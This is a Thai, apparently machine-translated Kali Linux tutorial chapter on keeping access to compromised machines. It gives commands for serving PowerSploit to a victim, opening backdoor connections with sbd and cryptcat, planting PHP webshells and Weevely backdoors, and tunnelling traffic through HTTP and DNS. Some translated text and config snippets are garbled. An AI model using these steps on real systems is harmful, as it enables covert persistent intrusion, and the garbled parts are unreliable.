Kali Linux - การรักษาการเข้าถึง

ในบทนี้เราจะเห็นเครื่องมือที่ Kali ใช้เพื่อรักษาการเชื่อมต่อและเพื่อเข้าถึงเครื่องที่ถูกแฮ็กแม้ว่าจะเชื่อมต่อและตัดการเชื่อมต่ออีกครั้งก็ตาม

อำนาจ

นี่เป็นเครื่องมือสำหรับเครื่อง Windows มี PowerShell ติดตั้งในเครื่องเหยื่อ เครื่องมือนี้ช่วยให้แฮ็กเกอร์สามารถเชื่อมต่อกับเครื่องของเหยื่อผ่าน PowerShell

หากต้องการเปิดให้เปิดเทอร์มินัลทางด้านซ้ายและพิมพ์คำสั่งต่อไปนี้เพื่อเข้าสู่โฟลเดอร์ powersploit -

cd /usr/share/powersploit/

ถ้าคุณพิมพ์ “ls”มันจะแสดงรายการเครื่องมือ powersploit ทั้งหมดที่คุณสามารถดาวน์โหลดและติดตั้งในเครื่องของเหยื่อหลังจากที่คุณได้รับการเข้าถึง ส่วนใหญ่เป็นชื่อตนเองอธิบายตามชื่อ

วิธีง่ายๆในการดาวน์โหลดเครื่องมือนี้บนเครื่องของเหยื่อคือการสร้างเว็บเซิร์ฟเวอร์ซึ่งเครื่องมือ powersploit อนุญาตให้สร้างได้อย่างง่ายดายโดยใช้คำสั่งต่อไปนี้ -

python -m SimpleHTTPServer

หลังจากนี้หากคุณพิมพ์: http: // <Kali machine ip_address>: 8000 / following คือผลลัพธ์

Sbd

sbd เป็นเครื่องมือที่คล้ายกับ Netcat เป็นแบบพกพาและสามารถใช้ในเครื่อง Linux และ Microsoft sbd มีการเข้ารหัส AES-CBC-128 + HMAC-SHA1> โดยทั่วไปจะช่วยเชื่อมต่อกับเครื่องของเหยื่อได้ตลอดเวลาบนพอร์ตเฉพาะและส่งคำสั่งจากระยะไกล

หากต้องการเปิดให้ไปที่เทอร์มินัลแล้วพิมพ์ “sbd -l -p port” เพื่อให้เซิร์ฟเวอร์ยอมรับการเชื่อมต่อ

ในกรณีนี้ให้เราใส่พอร์ต 44 ที่เซิร์ฟเวอร์จะรับฟัง

บนเว็บไซต์ของเหยื่อพิมพ์ “sbd IPofserver port”. การเชื่อมต่อจะถูกสร้างขึ้นซึ่งเราสามารถส่งคำสั่งระยะไกลได้

ในกรณีนี้มันคือ "localhost" เนื่องจากเราได้ทำการทดสอบในเครื่องเดียวกัน

ในที่สุดบนเซิร์ฟเวอร์คุณจะเห็นว่ามีการเชื่อมต่อเกิดขึ้นดังที่แสดงในภาพหน้าจอต่อไปนี้

Webshells

Webshells สามารถใช้เพื่อรักษาการเข้าถึงหรือแฮ็กเว็บไซต์ แต่ส่วนใหญ่จะถูกตรวจพบโดยโปรแกรมป้องกันไวรัส C99 php shell เป็นที่รู้จักกันดีในหมู่แอนตี้ไวรัส โปรแกรมป้องกันไวรัสทั่วไปจะตรวจพบว่าเป็นมัลแวร์ได้อย่างง่ายดาย

โดยทั่วไปหน้าที่หลักคือส่งคำสั่งระบบผ่านเว็บอินเตอร์เฟส

เพื่อเปิดและพิมพ์ “cd /usr/share/webshells/” ในเทอร์มินัล

ดังที่คุณเห็นพวกเขาแบ่งออกเป็นชั้นเรียนตามภาษาโปรแกรม: asp, aspx, cfm, jsp, perl, php

หากคุณเข้าไปในโฟลเดอร์ PHP คุณจะเห็นเว็บเชลล์ทั้งหมดสำหรับหน้าเว็บ php

ในการอัปโหลดเชลล์ไปยังเว็บเซิร์ฟเวอร์ตัวอย่างเช่น “simple-backdoor.php” เปิดหน้าเว็บและ URL ของเว็บเชลล์

ในตอนท้ายเขียนคำสั่ง cmd คุณจะมีข้อมูลทั้งหมดที่แสดงดังภาพหน้าจอต่อไปนี้

Weevely

Weevely เป็นเว็บเชลล์ PHP ที่จำลองการเชื่อมต่อแบบเทลเน็ต เป็นเครื่องมือสำหรับการหาประโยชน์จากการโพสต์แอปพลิเคชันบนเว็บและสามารถใช้เป็นแบ็คดอร์ที่ซ่อนตัวหรือเป็นเว็บเชลล์เพื่อจัดการบัญชีเว็บที่ถูกกฎหมายหรือแม้แต่บัญชีที่โฮสต์ฟรี

หากต้องการเปิดให้ไปที่เทอร์มินัลแล้วพิมพ์ "weevely" ซึ่งคุณจะเห็นการใช้งาน

ในการสร้างเชลล์ให้พิมพ์ “weevely generate password pathoffile”. ดังที่เห็นในภาพหน้าจอต่อไปนี้มันถูกสร้างขึ้นในโฟลเดอร์ "เดสก์ท็อป" และไฟล์จะต้องอัปโหลดในเว็บเซิร์ฟเวอร์เพื่อเข้าถึง

หลังจากอัปโหลดเว็บเชลล์ดังที่แสดงในภาพหน้าจอต่อไปนี้เราสามารถเชื่อมต่อกับ cmd ไปยังเซิร์ฟเวอร์โดยใช้คำสั่ง “weevely URL password” ซึ่งคุณจะเห็นว่าเซสชันเริ่มต้นแล้ว

http อุโมงค์

http-tunnel สร้างสตรีมข้อมูลเสมือนแบบสองทิศทางที่ปรับตามคำขอ HTTP สามารถส่งคำขอผ่านพร็อกซี HTTP ได้หากต้องการ สิ่งนี้มีประโยชน์สำหรับผู้ใช้ที่อยู่เบื้องหลังไฟร์วอลล์ที่ จำกัด หากอนุญาตให้เข้าถึง WWW ผ่านพร็อกซี HTTP คุณสามารถใช้ http-tunnel และ telnet หรือ PPP เพื่อเชื่อมต่อกับคอมพิวเตอร์นอกไฟร์วอลล์

ขั้นแรกเราควรสร้างเซิร์ฟเวอร์ทันเนลด้วยคำสั่งต่อไปนี้ -

httptunnel_server –h

จากนั้นในประเภทไซต์ไคลเอนต์ “httptunnel_client –h” และทั้งคู่จะเริ่มยอมรับการเชื่อมต่อ

dns2tcp

นี่เป็นอีกครั้งเครื่องมือการสร้างอุโมงค์ที่ช่วยส่งผ่านทราฟฟิก TCP ผ่าน DNS Traffic ซึ่งหมายถึงพอร์ต UDP 53

ในการเริ่มต้นให้พิมพ์ “dns2tcpd”. อธิบายการใช้งานเมื่อคุณจะเปิดสคริปต์

บนไซต์เซิร์ฟเวอร์ป้อนคำสั่งนี้เพื่อกำหนดค่าไฟล์

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

ในไซต์ไคลเอนต์ป้อนคำสั่งนี้

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076

Tunneling จะเริ่มต้นด้วยคำสั่งนี้

cryptcat

เป็นเครื่องมืออื่นเช่น Netcat ซึ่งช่วยให้สามารถเชื่อมต่อ TCP และ UDP กับเครื่องของเหยื่อด้วยวิธีเข้ารหัส

ในการเริ่มต้นเซิร์ฟเวอร์เพื่อรับฟังการเชื่อมต่อให้พิมพ์คำสั่งต่อไปนี้ -

cryptcat –l –p port –n

ที่ไหน

  • -l หมายถึงการฟังการเชื่อมต่อ

  • -p ย่อมาจากพารามิเตอร์หมายเลขพอร์ต

  • -n หมายถึงไม่ทำการแก้ไขชื่อ

บนไซต์ไคลเอ็นต์คำสั่งการเชื่อมต่อคือ “cryptcat IPofServer PortofServer”